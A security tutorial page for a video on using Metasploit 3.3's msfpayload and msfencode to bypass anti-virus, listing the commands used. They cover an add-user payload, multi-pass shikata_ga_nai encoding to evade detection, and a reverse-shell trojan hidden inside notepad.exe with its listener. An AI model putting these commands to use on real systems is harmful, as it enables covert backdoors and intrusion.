Help Irongeek.com pay for bandwidth and research equipment:
Using msfpayload and msfencode from Metasploit 3.3 to bypass anti-virus (Hacking Illustrated Series InfoSec Tutorial Videos)
Using msfpayload and msfencode from Metasploit 3.3 to bypass anti-virus
This subject has been covered before,
but why not once more? Metasploit 3.3 adds some new options, and better Windows
support. As stated in the title, this video will cover using msfpayload and
msfencode from Metasploit 3.3 to bypass anti-virus. I will also talk a little
about using CWSandbox and VirusTotal to examine malware.
If you find this video useful,
consider going to the
Metasploit Unleashed page and donating to the Hackers For Charity Kenya food
for work program, or come to the
IndySec charity event.
By the way, I've put
out two versions of this video, one an SWF and the other a streaming video.
Please let me know which you prefer.
If the embedded video below does not show RIGHT click here to save the file to your hard drive.
Commands used:
Show msfpayload help:
msfpayload -h|less
Find something specific in the help:
msfpayload -h | grep add
Show add a user payload example:
msfpayload windows/adduser s
Set the payload to add a user:
msfpayload windows/adduser pass=somepassword
user=evil x>out.exe
Show the fact it won't work yet, and show rights:
out.exe
Set execute rights:
chmod +x out.exe
Show that it works now, then use MMC to show the user was created:
out.exe
Show msfencode options:
msfencode -h
Show msfencode encoders:
msfencode -l
Encoded twice, once with one pass and again with 10, then upload both to virus
total to see the difference:
msfpayload windows/adduser pass=somepassword
user=evil r | msfencode -t exe -o e1.exe
msfpayload windows/adduser pass=somepassword user=evil r |
msfencode -t exe -e x86/shikata_ga_nai -c 10 -o e2.exe
Show msfcli help, then payload options:
msfcli -h
msfpayload windows/shell/reverse_tcp
s
Make the reverse shell payload exe, then the multi handler, then execute it on
some other box:
msfpayload windows/shell/reverse_tcp
LHOST=192.168.1.13 LPORT=31337 R | msfencode -x notepad.exe -t exe -e x86/shikata_ga_nai
-o reversenotepad.exe
msfcli exploit/multi/handler
PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.13 LPORT=31337 E